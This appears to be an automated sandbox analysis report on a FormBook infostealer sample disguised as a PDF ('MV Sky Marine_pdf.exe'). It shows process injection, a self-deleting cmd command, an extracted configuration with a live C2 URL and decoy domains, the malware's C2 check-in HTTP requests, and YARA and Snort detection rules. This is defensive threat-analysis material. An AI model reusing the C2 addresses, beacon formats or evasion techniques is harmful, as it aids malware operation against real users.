Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report MV Sky Marine_pdf.exe

Overview

General Information

Sample Name:MV Sky Marine_pdf.exe
Analysis ID:372691
MD5:9558601f64f4d03a49bf20b3c0186af0
SHA1:adaf4ce8f18f8085ead9a4d92a5806ac3c54921d
SHA256:00e599fadd6b7cd568751d9741ad77f85a7c9fdea785deed6898f348efd794fd
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • MV Sky Marine_pdf.exe (PID: 5580 cmdline: 'C:\Users\user\Desktop\MV Sky Marine_pdf.exe' MD5: 9558601F64F4D03A49BF20B3C0186AF0)
    • MV Sky Marine_pdf.exe (PID: 5476 cmdline: 'C:\Users\user\Desktop\MV Sky Marine_pdf.exe' MD5: 9558601F64F4D03A49BF20B3C0186AF0)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 4500 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 3552 cmdline: /c del 'C:\Users\user\Desktop\MV Sky Marine_pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.capacitaciondelfuturo.com/m2be/"], "decoy": ["sevenstepstohappy.co.uk", "best10hostings.com", "ponsatv.com", "estiqama.net", "miraculous.life", "sdsigmas.com", "lift-stock.xyz", "encoresmokeshop.com", "bahrsdie.info", "sacoriverdisc.com", "signi-notifcation.com", "fabulousfalafel.com", "gaitameonline.net", "dtzuixianya.com", "ebsesbaso.com", "maggionaossurvey.com", "thinkcleanedu.com", "jickstarter.com", "rakkuteno.icu", "nutri-vision.com", "soluzioniambientali.green", "somht.com", "smguidetowkw.com", "ondecktalentllc.com", "xcash.fund", "casinoflames.com", "cvacity.info", "reviewstechindia.com", "mantequillahub.pro", "fenixforex.com", "cxwanyuan.com", "thankyoumatcha.net", "aeo2.net", "pilarmarques.com", "yyxingfa.com", "antiracismbyu.com", "joncxvplw.com", "michaelroberts.gallery", "bachsimplicity.com", "pankotakediri.com", "lifemodern.online", "jayliving.com", "farmlifeonline.com", "watchtofree.com", "kantamiyatake.com", "kda2.com", "cvhrcm.com", "felinewish.com", "qwt.xyz", "verratjewelry.com", "studiocubodesign.net", "itallmall.com", "aingline.com", "qbuwobgii.icu", "owenvilla.com", "hipnoseportugal.com", "bestonline-businesses.com", "janetdeemasks.com", "indiaamazonica.com", "axa-imf.com", "paceclub.net", "magetu.info", "comercializadorajufe.com", "rahasiasuksesbo.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.275644751.00000000009E0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.275644751.00000000009E0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.1.MV Sky Marine_pdf.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.1.MV Sky Marine_pdf.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.1.MV Sky Marine_pdf.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        3.1.MV Sky Marine_pdf.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.1.MV Sky Marine_pdf.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.capacitaciondelfuturo.com/m2be/"], "decoy": ["sevenstepstohappy.co.uk", "best10hostings.com", "ponsatv.com", "estiqama.net", "miraculous.life", "sdsigmas.com", "lift-stock.xyz", "encoresmokeshop.com", "bahrsdie.info", "sacoriverdisc.com", "signi-notifcation.com", "fabulousfalafel.com", "gaitameonline.net", "dtzuixianya.com", "ebsesbaso.com", "maggionaossurvey.com", "thinkcleanedu.com", "jickstarter.com", "rakkuteno.icu", "nutri-vision.com", "soluzioniambientali.green", "somht.com", "smguidetowkw.com", "ondecktalentllc.com", "xcash.fund", "casinoflames.com", "cvacity.info", "reviewstechindia.com", "mantequillahub.pro", "fenixforex.com", "cxwanyuan.com", "thankyoumatcha.net", "aeo2.net", "pilarmarques.com", "yyxingfa.com", "antiracismbyu.com", "joncxvplw.com", "michaelroberts.gallery", "bachsimplicity.com", "pankotakediri.com", "lifemodern.online", "jayliving.com", "farmlifeonline.com", "watchtofree.com", "kantamiyatake.com", "kda2.com", "cvhrcm.com", "felinewish.com", "qwt.xyz", "verratjewelry.com", "studiocubodesign.net", "itallmall.com", "aingline.com", "qbuwobgii.icu", "owenvilla.com", "hipnoseportugal.com", "bestonline-businesses.com", "janetdeemasks.com", "indiaamazonica.com", "axa-imf.com", "paceclub.net", "magetu.info", "comercializadorajufe.com", "rahasiasuksesbo.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nssBDFE.tmp\lckp0.dllReversingLabs: Detection: 17%
          Multi AV Scanner detection for submitted fileShow sources
          Source: MV Sky Marine_pdf.exeVirustotal: Detection: 33%Perma Link
          Source: MV Sky Marine_pdf.exeReversingLabs: Detection: 23%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.275644751.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.275618923.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.496617029.0000000000F50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.496712195.0000000000F80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.235033668.0000000002670000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.1.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.MV Sky Marine_pdf.exe.2670000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.MV Sky Marine_pdf.exe.2670000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nssBDFE.tmp\lckp0.dllJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: MV Sky Marine_pdf.exeJoe Sandbox ML: detected
          Source: 3.1.MV Sky Marine_pdf.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.MV Sky Marine_pdf.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.MV Sky Marine_pdf.exe.2670000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.2.wlanext.exe.3867960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 8.2.wlanext.exe.c5de40.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: MV Sky Marine_pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: MV Sky Marine_pdf.exe, 00000002.00000003.231397905.0000000002D30000.00000004.00000001.sdmp, MV Sky Marine_pdf.exe, 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, wlanext.exe, 00000008.00000002.498016656.000000000344F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: MV Sky Marine_pdf.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: MV Sky Marine_pdf.exe, 00000003.00000002.275693776.0000000000A40000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: MV Sky Marine_pdf.exe, 00000003.00000002.275693776.0000000000A40000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 2_2_00405649 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00405649
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 2_2_0040601F FindFirstFileA,FindClose,2_2_0040601F
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 2_2_00402671 FindFirstFileA,2_2_00402671
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 4x nop then pop ebx3_2_00406A94
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 4x nop then pop ebx3_1_00406A94
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop ebx8_2_00A96A95

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49721 -> 172.106.71.28:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49721 -> 172.106.71.28:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49721 -> 172.106.71.28:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49730 -> 103.48.133.159:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49730 -> 103.48.133.159:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49730 -> 103.48.133.159:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49734 -> 192.0.78.25:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49734 -> 192.0.78.25:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49734 -> 192.0.78.25:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.capacitaciondelfuturo.com/m2be/
          Source: global trafficHTTP traffic detected: GET /m2be/?t8r=Pmzzl7xNdTjxpE7TKPUfs2K+Zd8HAaj1ahYlw/e4QxTLjn1ka96YHmJ+nuPWA19CGBx9&1bYxT=mTfpcdW HTTP/1.1Host: www.maggionaossurvey.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m2be/?t8r=0l3HkT4rKGRjwuaD6GRslzPylepCZX23oOXMbfcPML9ScCqaYm65vOxGdM+olqk7o7hp&1bYxT=mTfpcdW HTTP/1.1Host: www.fenixforex.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m2be/?t8r=ifCDsBLKzPO1/caYwbP7ucLsNIzdB7eAVK9yl0hh16u0W5iMVAB6bdOGECjvY1n5rRJ4&1bYxT=mTfpcdW HTTP/1.1Host: www.somht.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m2be/?t8r=JuGytuw0I2CvsJrhKPqxcSs+eAHRIhMzmg6m2gZ2Sf/5EFBq1ZxzSrCArrcyEBWmu86q&1bYxT=mTfpcdW HTTP/1.1Host: www.capacitaciondelfuturo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m2be/?t8r=ym0xxX00S0Wf+ixf12QOfxKttvR95wzAnITo9bxnjEKQPe2KXbpsv5dlZ+lGmtzP6AJs&1bYxT=mTfpcdW HTTP/1.1Host: www.mantequillahub.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m2be/?t8r=f9OOlDzSNjMkS+voKVj3JAm/FZou7FefMRO/dCbPYFE5jWEAY4Ie1mxxbA2c8ASh8bA/&1bYxT=mTfpcdW HTTP/1.1Host: www.casinoflames.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m2be/?t8r=NWfrKKCiNqgfEu2gJcL26nowwYOKbN5UMUQLTML9o4O8a7GsheA9LuahVJ9lTMe/g8Lv&1bYxT=mTfpcdW HTTP/1.1Host: www.yyxingfa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m2be/?t8r=3hs/fdpsiUpFetMliLQ5KTd9k1PXkNk579eBvZhq6Qtrn5Lx9iP8uWKZaCpCbSQvRdph&1bYxT=mTfpcdW HTTP/1.1Host: www.michaelroberts.galleryConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m2be/?t8r=Nsc7yOpCpBP+OvQ//1jYzNnBC3WFsexPKF5AJOP3i6aMz/2MKahDz4LAsxw3nwyoR3zf&1bYxT=mTfpcdW HTTP/1.1Host: www.antiracismbyu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 192.0.78.25 192.0.78.25
          Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: Joe Sandbox ViewASN Name: WORLDSTREAMNL WORLDSTREAMNL
          Source: global trafficHTTP traffic detected: GET /m2be/?t8r=Pmzzl7xNdTjxpE7TKPUfs2K+Zd8HAaj1ahYlw/e4QxTLjn1ka96YHmJ+nuPWA19CGBx9&1bYxT=mTfpcdW HTTP/1.1Host: www.maggionaossurvey.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m2be/?t8r=0l3HkT4rKGRjwuaD6GRslzPylepCZX23oOXMbfcPML9ScCqaYm65vOxGdM+olqk7o7hp&1bYxT=mTfpcdW HTTP/1.1Host: www.fenixforex.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m2be/?t8r=ifCDsBLKzPO1/caYwbP7ucLsNIzdB7eAVK9yl0hh16u0W5iMVAB6bdOGECjvY1n5rRJ4&1bYxT=mTfpcdW HTTP/1.1Host: www.somht.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m2be/?t8r=JuGytuw0I2CvsJrhKPqxcSs+eAHRIhMzmg6m2gZ2Sf/5EFBq1ZxzSrCArrcyEBWmu86q&1bYxT=mTfpcdW HTTP/1.1Host: www.capacitaciondelfuturo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m2be/?t8r=ym0xxX00S0Wf+ixf12QOfxKttvR95wzAnITo9bxnjEKQPe2KXbpsv5dlZ+lGmtzP6AJs&1bYxT=mTfpcdW HTTP/1.1Host: www.mantequillahub.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m2be/?t8r=f9OOlDzSNjMkS+voKVj3JAm/FZou7FefMRO/dCbPYFE5jWEAY4Ie1mxxbA2c8ASh8bA/&1bYxT=mTfpcdW HTTP/1.1Host: www.casinoflames.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m2be/?t8r=NWfrKKCiNqgfEu2gJcL26nowwYOKbN5UMUQLTML9o4O8a7GsheA9LuahVJ9lTMe/g8Lv&1bYxT=mTfpcdW HTTP/1.1Host: www.yyxingfa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m2be/?t8r=3hs/fdpsiUpFetMliLQ5KTd9k1PXkNk579eBvZhq6Qtrn5Lx9iP8uWKZaCpCbSQvRdph&1bYxT=mTfpcdW HTTP/1.1Host: www.michaelroberts.galleryConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m2be/?t8r=Nsc7yOpCpBP+OvQ//1jYzNnBC3WFsexPKF5AJOP3i6aMz/2MKahDz4LAsxw3nwyoR3zf&1bYxT=mTfpcdW HTTP/1.1Host: www.antiracismbyu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.best10hostings.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 22 Mar 2021 07:56:14 GMTContent-Type: text/htmlContent-Length: 7354Connection: closeLast-Modified: Sat, 13 Feb 2021 16:45:30 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3a 20 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 2f 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 53 4b 59 50 45 5f 54 4f 4f 4c 42 41 52 22 20 63 6f 6e 74 65 6e 74 3d 22 53 4b 59 50 45 5f 54 4f 4f 4c 42 41 52 5f 50 41 52 53 45 52 5f 43 4f 4d 50 41 54 49 42 4c 45 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 20 73 69 7a 65 73 3d 22 35 37 78 35 37 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 6f 73 74 6e 6c 30 33 2e 66 6f 72 6e 65 78 2e 68 6f 73 74 2f 34 30 34 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 35 37 78 35 37 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 20 73 69 7a 65 73 3d 22 31 31 34 78 31 31 34 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 6f 73 74 6e 6c 30 33 2e 66 6f 72 6e 65 78 2e 68 6f 73 74 2f 34 30 34 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 31 31 34 78 31 31 34 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 20 73 69 7a 65 73 3d 22 37 32 78 37 32 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 6f 73 74 6e 6c 30 33 2e 66 6f 72 6e 65 78 2e 68 6f 73 74 2f 34 30 34 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 37 32 78 37 32 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 20 73 69 7a 65 73 3d 22 31 34 34 78 31 34 34 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 6f 73 74 6e 6c 30 33 2e 66 6f 72 6e 65 78 2e 68 6f 73 74 2f 34 30 34 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 31 34 34 78 31 34 34 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d
          Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: MV Sky Marine_pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: MV Sky Marine_pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
